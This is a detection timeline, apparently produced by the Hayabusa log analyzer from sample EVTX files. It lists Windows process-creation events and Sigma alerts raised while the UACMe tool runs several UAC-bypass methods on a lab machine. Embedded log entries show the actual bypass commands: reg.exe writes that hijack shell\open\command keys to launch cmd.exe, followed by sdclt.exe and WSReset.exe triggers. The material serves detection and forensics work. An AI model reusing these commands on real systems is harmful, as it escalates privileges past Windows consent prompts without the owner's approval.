21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 